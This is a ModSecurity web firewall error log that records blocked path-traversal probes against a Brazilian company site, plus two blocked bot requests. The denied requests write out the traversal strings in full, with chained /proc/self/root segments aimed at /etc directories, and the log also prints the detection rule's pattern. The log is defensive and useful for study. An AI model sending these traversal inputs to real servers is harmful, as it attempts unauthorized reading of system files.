[Wed Mar 18 12:00:42.074257 2026] [:error] [pid 17653:tid 140411741927168] [client 74.7.243.128:52970] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq-Gsdf6f5d65gmYZThmwAAAsA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 12:00:43.452190 2026] [:error] [pid 17887:tid 140411624429312] [client 74.7.243.128:52980] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq-GwkwaGbbGflqUZAcZAAAAM4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 12:00:51.523559 2026] [:error] [pid 29882:tid 140411699963648] [client 74.7.243.128:52984] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq-I0zinOy1jxa1j4civAAAAQU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 12:00:54.327549 2026] [:error] [pid 15826:tid 140411699963648] [client 74.7.241.31:33758] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq-JuoXxyEfFpUF8f96YQAAAUU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 12:00:56.763149 2026] [:error] [pid 29882:tid 140411725141760] [client 74.7.243.128:52984] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq-J0zinOy1jxa1j4ciwAAAAQI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 12:01:09.312009 2026] [:error] [pid 15051:tid 140411590858496] [client 74.7.243.128:35976] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq-NSmAPhZkrhU8w4l5_QAAAJI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 12:01:29.821554 2026] [:error] [pid 26799:tid 140411691570944] [client 74.7.243.128:45872] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq-Sda6ubjKNq_cu4ao4wAAA0Y"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 12:02:02.192556 2026] [:error] [pid 19507:tid 140411574073088] [client 74.7.243.128:41596] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq-atY0UrI5A3LftIy8wwAAAZQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 12:02:36.502849 2026] [:error] [pid 17653:tid 140411649607424] [client 74.7.243.128:32806] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq-jMdf6f5d65gmYZTh5QAAAss"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 12:02:42.992679 2026] [:error] [pid 26799:tid 140411632822016] [client 74.7.243.128:56242] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq-kta6ubjKNq_cu4ao9wAAA00"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 12:02:48.374771 2026] [:error] [pid 29882:tid 140411658000128] [client 74.7.241.31:52546] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq-l0zinOy1jxa1j4cjPgAAAQo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 12:02:52.119921 2026] [:error] [pid 19507:tid 140411540502272] [client 74.7.243.128:60298] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq-nNY0UrI5A3LftIy88wAAAZg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 12:03:00.953654 2026] [:error] [pid 26799:tid 140411607643904] [client 74.7.241.31:55448] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq-pNa6ubjKNq_cu4apBAAAA1A"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 12:03:31.617550 2026] [:error] [pid 19507:tid 140411741927168] [client 74.7.243.128:56128] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq-w9Y0UrI5A3LftIy9JwAAAYA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 12:03:32.923440 2026] [:error] [pid 17887:tid 140411691570944] [client 74.7.243.128:43874] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq-xAkwaGbbGflqUZAcrwAAAMY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 12:03:37.712515 2026] [:error] [pid 15826:tid 140411674785536] [client 74.7.243.128:43888] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq-yeoXxyEfFpUF8f96vwAAAUg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 12:03:51.618481 2026] [:error] [pid 11816:tid 140411624429312] [client 74.7.228.61:49716] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abq-1-w_le52K8_3pV3sjAAAAg4"]
[Wed Mar 18 12:03:53.002865 2026] [:error] [pid 30077:tid 140411666392832] [client 74.7.244.43:37708] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abq-2fu8EFLIOrSqIpsQ2wAAAkk"]
[Wed Mar 18 12:03:54.470370 2026] [:error] [pid 26799:tid 140411641214720] [client 74.7.241.31:50880] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq-2ta6ubjKNq_cu4apTgAAA0w"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 12:04:01.914613 2026] [:error] [pid 15051:tid 140411616036608] [client 74.7.243.128:43902] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq-4SmAPhZkrhU8w4l6gwAAAI8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 12:04:06.829528 2026] [:error] [pid 19507:tid 140411649607424] [client 74.7.243.128:35576] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq-5tY0UrI5A3LftIy9RgAAAYs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 12:04:20.208110 2026] [:error] [pid 15051:tid 140411565680384] [client 74.7.243.128:35590] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq-9CmAPhZkrhU8w4l6qQAAAJU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 12:04:28.179417 2026] [:error] [pid 31803:tid 140411624429312] [client 74.7.243.128:35154] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq-_OyqAr6etmhZHNrQ9QAAAE4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
